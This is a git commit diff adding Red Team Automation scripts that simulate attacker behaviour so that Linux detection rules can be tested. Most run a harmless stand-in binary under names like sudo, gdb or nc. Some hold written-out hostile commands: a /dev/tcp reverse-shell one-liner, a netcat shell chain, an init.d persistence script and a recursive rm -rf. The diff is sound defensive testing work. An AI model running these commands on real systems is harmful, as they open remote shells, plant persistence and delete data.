react_sync_rta_updates_3575 (#3762)

This commit is contained in:
Eric Forte
2024-06-06 14:42:37 -04:00
committed by GitHub
parent d3e2f70ce2
commit 57095a28b9
46 changed files with 1406 additions and 107 deletions
+5 -6
View File
@@ -4,11 +4,10 @@
# 2.0.
# Name: Adobe Hijack Persistence
# RTA: adobe_hijack.py
# ATT&CK: T1044
# Description: Replaces PE file that will run on Adobe Reader start.
import os
import sys
from pathlib import Path
from . import RtaMetadata, common
@@ -23,7 +22,7 @@ metadata = RtaMetadata(
@common.requires_os(*metadata.platforms)
def main():
def main() -> None:
rdr_cef_dir = Path("C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF")
rdrcef_exe = rdr_cef_dir / "RdrCEF.exe"
cmd_path = "C:\\Windows\\System32\\cmd.exe"
@@ -32,11 +31,11 @@ def main():
# backup original if it exists
if rdrcef_exe.is_file():
common.log("{} already exists, backing up file.".format(rdrcef_exe))
common.log(f"{rdrcef_exe} already exists, backing up file.")
common.copy_file(rdrcef_exe, backup)
backedup = True
else:
common.log("{} doesn't exist. Creating path.".format(rdrcef_exe))
common.log(f"{rdrcef_exe} doesn't exist. Creating path.")
rdr_cef_dir.mkdir(parents=True)
# overwrite original
@@ -53,4 +52,4 @@ def main():
if __name__ == "__main__":
exit(main())
sys.exit(main())
+36
View File
@@ -0,0 +1,36 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="a078ecca-e8b8-4ae8-a76c-3238e74ca34d",
platforms=["linux"],
endpoint=[
{"rule_id": "13fd98ce-f1c3-423f-9441-45c50eb462c0", "rule_name": "Attempt to etablish VScode Remote Tunnel"},
],
siem=[],
techniques=["T1102", "T1059"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "/tmp/code"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Executing Fake commands to test Attempt to etablish VScode Remote Tunnel")
common.execute([masquerade, "tunnel"], timeout=10, kill=True)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+10 -14
View File
@@ -3,14 +3,15 @@
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
from . import common
from . import RtaMetadata
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="631a211d-bdaa-4b9d-a786-31d84d7bc070",
platforms=["linux", "macos"],
platforms=["linux"],
endpoint=[
{"rule_id": "31da6564-b3d3-4fc8-9a96-75ad0b364363", "rule_name": "Tampering of Bash Command-Line History"}
{"rule_id": "31da6564-b3d3-4fc8-9a96-75ad0b364363", "rule_name": "Tampering of Bash Command-Line History"},
],
siem=[],
techniques=["T1070", "T1070.003"],
@@ -18,23 +19,18 @@ metadata = RtaMetadata(
@common.requires_os(*metadata.platforms)
def main():
def main() -> None:
masquerade = "/tmp/history"
if common.CURRENT_OS == "linux":
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
else:
common.create_macos_masquerade(masquerade)
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Launching fake builtin commands for tampering of bash command line history")
command = "-c"
common.execute([masquerade, command], timeout=10, kill=True, shell=True)
common.execute([masquerade, command], timeout=10, kill=True, shell=True) # noqa: S604
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
exit(main())
sys.exit(main())
Binary file not shown.
@@ -0,0 +1,44 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="1b7fe2e7-29c0-4d10-9ced-8b9cd158835d",
platforms=["linux"],
endpoint=[
{
"rule_id": "78ae5dbd-477b-4ce7-a7f7-8c4b5e228df2",
"rule_name": "Binary Executed from Shared Memory Directory",
},
],
siem=[
{
"rule_id": "3f3f9fe2-d095-11ec-95dc-f661ea17fbce",
"rule_name": "Binary Executed from Shared Memory Directory",
},
],
techniques=["T1620"],
)
@common.requires_os(metadata.platforms)
def main() -> None:
masquerade = "/dev/shm/test"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Executing Fake binary from Shared Memory")
common.execute([masquerade, "test"], timeout=10, kill=True)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+7 -11
View File
@@ -4,10 +4,9 @@
# 2.0.
import platform
import sys
from . import common
from . import RtaMetadata
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="e061a96e-4c31-4f67-9745-6ff873f7829e",
@@ -16,13 +15,13 @@ metadata = RtaMetadata(
{
"rule_name": "Potential Cookies Theft via Browser Debugging",
"rule_id": "5d7328aa-973b-41e7-a6b3-6f40ea3094f1",
}
},
],
siem=[
{
"rule_name": "Potential Cookies Theft via Browser Debugging",
"rule_id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb",
}
},
],
techniques=["T1539"],
)
@@ -31,14 +30,11 @@ EXE_FILE = common.get_path("bin", "renamed_posh.exe")
@common.requires_os(*metadata.platforms)
def main():
def main() -> None:
param1 = "--remote-debugging-port=9222"
param2 = "--user-data-dir=remote-profile"
if platform.system() == "Darwin":
if platform.processor() == "arm":
name = "com.apple.ditto_and_spawn_arm"
else:
name = "com.apple.ditto_and_spawn_intel"
name = "com.apple.ditto_and_spawn_arm" if platform.processor() == "arm" else "com.apple.ditto_and_spawn_intel"
source = common.get_path("bin", name)
chrome = "/tmp/google-chrome"
@@ -66,4 +62,4 @@ def main():
if __name__ == "__main__":
exit(main())
sys.exit(main())
+9 -8
View File
@@ -4,9 +4,10 @@
# 2.0.
import os
from . import common
import pathlib
from . import RtaMetadata
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="c69a06f3-3873-4d5d-8584-035e0921b4a8",
@@ -15,7 +16,7 @@ metadata = RtaMetadata(
{
"rule_id": "15019d7c-42e6-4cf7-88b0-0c3a6963e6f5",
"rule_name": "Suspicious Recursive File Deletion via Built-In Utilities",
}
},
],
siem=[],
techniques=["T1565", "T1485"],
@@ -23,14 +24,14 @@ metadata = RtaMetadata(
@common.requires_os(*metadata.platforms)
def main():
def main() -> None:
masquerade = "/tmp/xargs"
masquerade2 = "/tmp/rm"
# used only for linux at 2 places to enumerate xargs as parent process.
working_dir = "/tmp/fake_folder/xargs"
if common.CURRENT_OS == "linux":
source = common.get_path("bin", "linux.ditto_and_spawn")
# Using the Linux binary that simulates parent-> child process in Linux
source = common.get_path("bin", "linux_ditto_and_spawn_parent_child")
common.copy_file(source, masquerade)
common.copy_file(source, masquerade2)
# As opposed to macos, where the masquerade is being projected as parent process,
@@ -47,7 +48,7 @@ def main():
# Execute command
common.log("Launching fake builtin commands to recursively delete")
command = f"{masquerade2} -rf arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10 /home/test"
common.execute([masquerade, "childprocess", command], timeout=10, kill=True, shell=True)
common.execute([masquerade, "childprocess", command], timeout=10, kill=True, shell=True) # noqa: S604
# cleanup
common.remove_file(masquerade)
@@ -57,4 +58,4 @@ def main():
if __name__ == "__main__":
exit(main())
sys.exit(main())
+36
View File
@@ -0,0 +1,36 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="fcd2d0fe-fed2-424a-bdc5-e9bef5031344",
platforms=["linux"],
endpoint=[{"rule_name": "Network Activity Detected via cat", "rule_id": "25ae94f5-0214-4bf1-b534-33d4ffc3d41c"}],
siem=[{"rule_name": "Network Activity Detected via cat", "rule_id": "afd04601-12fc-4149-9b78-9c3f8fe45d39"}],
techniques=[""],
)
@common.requires_os(metadata.platforms)
def main() -> None:
common.log("Creating a fake cat executable..")
masquerade = "/tmp/cat"
source = common.get_path("bin", "netcon_exec_chain.elf")
common.copy_file(source, masquerade)
common.log("Granting execute permissions...")
common.execute(["chmod", "+x", masquerade])
common.log("Simulating cat network activity..")
common.execute([masquerade, "netcon", "-h", "8.8.8.8", "-p", "53"], timeout=10, kill=True, shell=True) # noqa: S604
common.log("Cat network simulation successful!")
common.log("Cleaning...")
common.remove_file(masquerade)
common.log("RTA completed!")
if __name__ == "__main__":
sys.exit(main())
+39
View File
@@ -0,0 +1,39 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="8d6f2979-747a-42d9-813a-ddadd90650d2",
platforms=["linux"],
endpoint=[
{
"rule_id": "7b9ddfc8-8ea8-45d5-b62f-3fbd142c8f08",
"rule_name": "Behavior Protection - Cloud Reputation EICAR",
},
],
siem=[],
techniques=["TA0002"],
)
@common.requires_os(metadata.platforms)
def main() -> None:
masquerade = "/tmp/bash"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Launching Behavior Protection - Cloud Reputation EICAR")
common.execute([masquerade, "test-cloudreputationrule-5020a0031cad"], timeout=10, kill=True)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+39
View File
@@ -0,0 +1,39 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="43ce7648-d48a-4609-80a5-f68384e498d3",
platforms=["linux"],
endpoint=[
{
"rule_id": "05f95917-6942-4aab-a904-37c6db906503",
"rule_name": "Potential Linux Credential Dumping via Unshadow",
},
],
siem=[],
techniques=["T1003"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "/tmp/unshadow"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Executing Fake commands to test Credential Dumping via Unshadow")
common.execute([masquerade, "shadow password"], timeout=10, kill=True)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+48
View File
@@ -0,0 +1,48 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="e5a98cc9-1f15-4d14-baf2-96bebb932ae9",
platforms=["linux"],
endpoint=[
{
"rule_name": "Potential Linux Credential Dumping via Proc Filesystem",
"rule_id": "508226f9-4030-4e86-86cd-63321b7164bc",
},
],
siem=[
{
"rule_name": "Potential Linux Credential Dumping via Proc Filesystem",
"rule_id": "ef100a2e-ecd4-4f72-9d1e-2f779ff3c311",
},
],
techniques=["T1212", "T1003", "T1003.007"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "/tmp/ps"
masquerade2 = "/tmp/strings"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
common.copy_file(source, masquerade2)
# Execute command
common.log("Launching fake commands to dump credential via proc")
common.execute([masquerade, "-eo", "pid", "command"], timeout=5, kill=True)
common.execute([masquerade2, "/tmp/test"], timeout=5, kill=True)
# cleanup
common.remove_file(masquerade)
common.remove_file(masquerade2)
if __name__ == "__main__":
sys.exit(main())
+44
View File
@@ -0,0 +1,44 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="df91f5f2-a0a0-47e8-848b-d01526a43d60",
platforms=["linux"],
endpoint=[
{
"rule_name": "Potential Sudo Privilege Escalation via CVE-2019-14287",
"rule_id": "b382c343-892d-46e1-8fad-22576a086598",
},
],
siem=[
{
"rule_name": "Potential Sudo Privilege Escalation via CVE-2019-14287",
"rule_id": "8af5b42f-8d74-48c8-a8d0-6d14b4197288",
},
],
techniques=["T1068"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "/tmp/sudo"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Launching fake sudo command to simulate CVE-2019-14287")
common.execute([masquerade, "-u#-1"], timeout=5, kill=True)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+43
View File
@@ -0,0 +1,43 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="432b8bb0-03e2-4618-bda9-77c0cef7eef8",
platforms=["linux"],
endpoint=[
{
"rule_id": "22145fc0-dc4c-4187-8397-4d20162fc391",
"rule_name": "CVE-2023-0386 Exploitation Attempt",
},
],
siem=[],
techniques=["T1068"],
)
@common.requires_os(metadata.platforms)
def main() -> None:
masquerade = "/tmp/fuse"
masquerade2 = "/tmp/fusermount"
# Using the Linux binary that simulates parent-> child process in Linux
source = common.get_path("bin", "linux_ditto_and_spawn_parent_child")
common.copy_file(source, masquerade)
common.copy_file(source, masquerade2)
# Execute command
common.log("Executing Fake Commands to simulate CVE-2023-0386 Exploitation Attempt")
command = f"{masquerade2} -o rw,nosuid,nodev ./* "
common.execute([masquerade, "childprocess", command], timeout=10, kill=True, shell=True) # noqa: S604
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+4 -5
View File
@@ -3,9 +3,9 @@
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
from . import common
from . import RtaMetadata
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="4843eb25-3579-473a-b309-76d02eda3085",
@@ -17,8 +17,7 @@ metadata = RtaMetadata(
@common.requires_os(*metadata.platforms)
def main():
def main() -> None:
masquerade = "/tmp/xargs"
if common.CURRENT_OS == "linux":
source = common.get_path("bin", "linux.ditto_and_spawn")
@@ -35,4 +34,4 @@ def main():
if __name__ == "__main__":
exit(main())
sys.exit(main())
+40
View File
@@ -0,0 +1,40 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="4eceac28-10c3-425f-a007-c03a9b57956f",
platforms=["linux"],
endpoint=[
{
"rule_id": "b63df89d-ac6f-44d7-80fa-ddf038295e42",
"rule_name": "Attempt to Disable Linux Security and Logging Controls",
},
],
siem=[],
techniques=["T1562", "T1562.001"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "/tmp/systemctl"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Launching fake builtin commands for disabling security controls")
command = "stop"
command1 = "apparmor"
common.execute([masquerade, command, command1], timeout=10, kill=True, shell=True) # noqa: S604
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+4 -5
View File
@@ -3,9 +3,9 @@
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
from . import common
from . import RtaMetadata
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="be090f8e-dc7b-41eb-9c7e-74a0aed0dad1",
@@ -17,8 +17,7 @@ metadata = RtaMetadata(
@common.requires_os(*metadata.platforms)
def main():
def main() -> None:
masquerade = "/tmp/eggshell"
if common.CURRENT_OS == "linux":
source = common.get_path("bin", "linux.ditto_and_spawn")
@@ -35,4 +34,4 @@ def main():
if __name__ == "__main__":
exit(main())
sys.exit(main())
+5 -6
View File
@@ -3,8 +3,9 @@
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
from . import common
from . import RtaMetadata
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="c8efd8c9-b32c-482a-90ff-f2d366a2af45",
@@ -16,8 +17,7 @@ metadata = RtaMetadata(
@common.requires_os(*metadata.platforms)
def main():
def main() -> None:
masquerade = "/tmp/bash"
if common.CURRENT_OS in ["linux", "macos"]:
if common.CURRENT_OS == "linux":
@@ -33,7 +33,6 @@ def main():
# cleanup
common.remove_file(masquerade)
else:
cmd = "C:\\Windows\\System32\\cmd.exe"
# Execute command
@@ -42,4 +41,4 @@ def main():
if __name__ == "__main__":
exit(main())
sys.exit(main())
+4 -5
View File
@@ -3,9 +3,9 @@
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
from . import common
from . import RtaMetadata
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="4d7ce5b3-f8e4-434c-9caa-c7e133146b27",
@@ -17,8 +17,7 @@ metadata = RtaMetadata(
@common.requires_os(*metadata.platforms)
def main():
def main() -> None:
masquerade = "/tmp/bash"
if common.CURRENT_OS == "linux":
source = common.get_path("bin", "linux.ditto_and_spawn")
@@ -39,4 +38,4 @@ def main():
if __name__ == "__main__":
exit(main())
sys.exit(main())
+9 -7
View File
@@ -3,15 +3,18 @@
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
from . import common
from . import RtaMetadata
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="b88c08af-eee5-4683-a56a-36e91e6386d5",
platforms=["macos", "linux"],
endpoint=[
{"rule_name": "Privilege Escalation Enumeration via LinPEAS", "rule_id": "92bb2a27-745b-4291-90a1-b7b654df1379"}
{
"rule_name": "Privilege Escalation Enumeration via LinPEAS",
"rule_id": "92bb2a27-745b-4291-90a1-b7b654df1379",
},
],
siem=[],
techniques=["T1059"],
@@ -19,8 +22,7 @@ metadata = RtaMetadata(
@common.requires_os(*metadata.platforms)
def main():
def main() -> None:
masquerade = "/tmp/sed"
if common.CURRENT_OS == "linux":
source = common.get_path("bin", "linux.ditto_and_spawn")
@@ -29,11 +31,11 @@ def main():
common.create_macos_masquerade(masquerade)
common.log("Executing fake sed command for LinPEAS behavior.")
common.execute([masquerade, "testImPoSSssSiBlEeetest"], timeout=5, kill=True, shell=True)
common.execute([masquerade, "testImPoSSssSiBlEeetest"], timeout=5, kill=True, shell=True) # noqa: S604
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
exit(main())
sys.exit(main())
+40
View File
@@ -0,0 +1,40 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import os
import sys
from pathlib import Path
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="11b447ca-6ad4-4597-a048-2585b27762ea",
platforms=["linux"],
endpoint=[{"rule_name": "Shell Command Execution via kworker", "rule_id": "94943f02-5580-4d1d-a763-09e958bd0f57"}],
siem=[],
techniques=["T1036", "T1059"],
)
@common.requires_os(metadata.platforms)
def main() -> None:
masquerade_script = Path("/tmp/kworker_evasion.sh")
with masquerade_script.open("w") as f:
f.write("#!/bin/bash\n")
f.write("sh -c 'whoami'\n")
# Make the script executable
masquerade_script.chmod(0o755)
# Execute the script
common.log("Launching fake command to simulate a kworker execution")
os.system(str(masquerade_script)) # noqa: S605
# Cleanup
masquerade_script.unlink()
if __name__ == "__main__":
sys.exit(main())
@@ -0,0 +1,48 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="6a5977f6-ed19-446e-a441-e325cff7772b",
platforms=["linux"],
endpoint=[
{
"rule_name": "Potential curl CVE-2023-38545 Exploitation",
"rule_id": "0c188a15-30f5-445c-8655-95c7f93ace88",
},
],
siem=[
{
"rule_name": "Potential curl CVE-2023-38545 Exploitation",
"rule_id": "f41296b4-9975-44d6-9486-514c6f635b2d",
},
],
techniques=["T1203"],
)
@common.requires_os(metadata.platforms)
def main() -> None:
masquerade = "/tmp/curl"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
payload += "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
payload += "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
# Execute command
common.log("Launching fake command to simulate a buffer overflow")
common.execute([masquerade, "--proxy", payload], timeout=5, kill=True)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+36
View File
@@ -0,0 +1,36 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="163dbe60-28e0-4042-b2f0-173dddea877b",
platforms=["linux"],
endpoint=[
{"rule_name": "Linux init (PID 1) Secret Dump via GDB", "rule_id": "ba70be59-bf50-48a9-8b36-0f0808a50fb8"},
],
siem=[{"rule_name": "Linux init (PID 1) Secret Dump via GDB", "rule_id": "d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f"}],
techniques=["T1003"],
)
@common.requires_os(metadata.platforms)
def main() -> None:
masquerade = "/tmp/gdb"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Launching fake GDB commands to hook the init process")
common.execute([masquerade, "--pid", "1"], timeout=5, kill=True)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
@@ -0,0 +1,52 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from pathlib import Path
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="be8c9227-8266-4d91-931e-c53e07731d07",
platforms=["linux"],
endpoint=[
{
"rule_name": "Linux User Discovery Command Execution from Suspicious Directory",
"rule_id": "c932c9f0-76ed-4d78-a242-cfaade43080c",
},
],
techniques=["T1059", "T1033"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
# Path for the fake executable
fake_executable = "/dev/shm/evil"
# Create fake whoami executable
masquerade = "/dev/shm/whoami"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Create a fake executable that launches whoami
with Path(fake_executable).open("w") as script:
script.write("#!/bin/bash\n")
script.write("/dev/shm/whoami\n")
# Make the script executable
common.execute(["chmod", "+x", fake_executable])
# Execute the fake executable
common.log("Launching whoami as a child of fake executable")
common.execute([fake_executable], timeout=5, kill=True, shell=True) # noqa: S604
# Cleanup
common.remove_file(fake_executable)
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+40
View File
@@ -0,0 +1,40 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="94366604-8f84-448e-9761-0eb7b45bc2fa",
platforms=["linux"],
endpoint=[
{
"rule_name": "Linux Suspicious Child Process Execution via Interactive Shell",
"rule_id": "aa02591f-c9e6-4317-841e-0b075b9515ff",
},
],
techniques=["T1059"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "/tmp/bash"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
commands = [masquerade, "-i"]
# Execute command
common.log("Launching fake command to simulate an interactive shell process")
common.execute([*commands], timeout=5, kill=True)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+34
View File
@@ -0,0 +1,34 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="9b0bbe6d-2116-4327-930b-51e3e5097487",
platforms=["linux"],
endpoint=[{"rule_name": "Potential Linux Hack Tool Launched", "rule_id": "3337a10c-e950-4827-a44e-96a688fba221"}],
siem=[{"rule_name": "Potential Linux Hack Tool Launched", "rule_id": "1df1152b-610a-4f48-9d7a-504f6ee5d9da"}],
techniques=[""],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "/tmp/crackmapexec"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Launching fake command to simulate a CME process")
common.execute([masquerade], timeout=5, kill=True)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
@@ -0,0 +1,51 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
from . import common
from . import RtaMetadata
metadata = RtaMetadata(
uuid="4076de6c-6caa-40b3-bfb6-548645823376",
platforms=["linux"],
endpoint=[
{
"rule_name": "Init.d Script Executed Binary from Unusual Location",
"rule_id": "879c083c-e2d9-4f75-84f2-0f1471d915a8"
}
],
techniques=["T1037"],
)
@common.requires_os(*metadata.platforms)
def main():
# Path for the fake initd script
fake_initd = "/etc/init.d/rta"
# Create fake sh executable
masquerade = "/tmp/sh"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Create a fake initd script that launches sh
with open(fake_initd, 'w') as script:
script.write('#!/bin/bash\n')
script.write('/tmp/sh\n')
# Make the script executable
common.execute(['chmod', '+x', fake_initd])
common.execute(['chmod', '+x', masquerade])
# Execute the fake initd script
common.log("Launching a shell that executes a payload as a child of fake initd")
common.execute([fake_initd], timeout=5, kill=True, shell=True)
# Cleanup
common.remove_file(fake_initd)
if __name__ == "__main__":
exit(main())
@@ -0,0 +1,39 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="5282c9a4-4ce9-48b8-863a-ff453143635a",
platforms=["linux"],
endpoint=[],
siem=[{"rule_name": "Suspicious File Creation via kworker", "rule_id": "ae343298-97bc-47bc-9ea2-5f2ad831c16e"}],
techniques=["T1547", "T1014"],
)
@common.requires_os(metadata.platforms)
def main() -> None:
masquerade = "/tmp/kworker"
source = common.get_path("bin", "create_file.elf")
common.copy_file(source, masquerade)
common.log("Granting execute permissions...")
common.execute(["chmod", "+x", masquerade])
commands = [masquerade, "/tmp/evil"]
common.log("Simulating file creation activity..")
common.execute([*commands], timeout=5)
common.log("File creation simulation successful!")
common.log("Cleaning...")
common.remove_file(masquerade)
common.log("RTA completed!")
if __name__ == "__main__":
sys.exit(main())
+31
View File
@@ -0,0 +1,31 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import subprocess
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="a5603982-8b43-4ea9-b8de-112d9817e12d",
platforms=["linux"],
endpoint=[{"rule_name": "Linux Reverse Shell", "rule_id": "52206861-4570-4b8b-a73e-4ef0ea379a4c"}],
siem=[],
techniques=["T1059", "T1071"],
)
@common.requires_os(metadata.platforms)
def main() -> None:
common.log("Creating the bash command to execute to get the proper parent/child relationship in place...")
# Bash command that attempts a network connection and then starts a new bash process with the -i flag
bash_command = 'exec 3<>/dev/tcp/8.8.8.8/53; echo -e "Connection Test" >&3; exec 3<&-; exec 3>&-; exec bash -i'
common.log("Executing the bash command...")
# Use subprocess.Popen to execute the bash command
subprocess.Popen(["bash", "-c", bash_command]) # noqa: S603 S607
common.log("Simulation successful!")
if __name__ == "__main__":
main()
+37
View File
@@ -0,0 +1,37 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="ecb34b55-2947-48af-b746-3a472abfda43",
platforms=["linux"],
endpoint=[{"rule_name": "Linux Reverse Shell via netcat", "rule_id": "c0ca8114-254d-46ba-88c6-db57de6efe2d"}],
siem=[],
techniques=["T1059", "T1071"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
common.log("Creating a fake nc executable..")
masquerade = "/tmp/nc"
source = common.get_path("bin", "netcon_exec_chain.elf")
common.copy_file(source, masquerade)
common.log("Granting execute permissions...")
common.execute(["chmod", "+x", masquerade])
commands = [masquerade, "chain", "-h", "8.8.8.8", "-p", "1234", "-c", "-e", "nc 8.8.8.8 1234"]
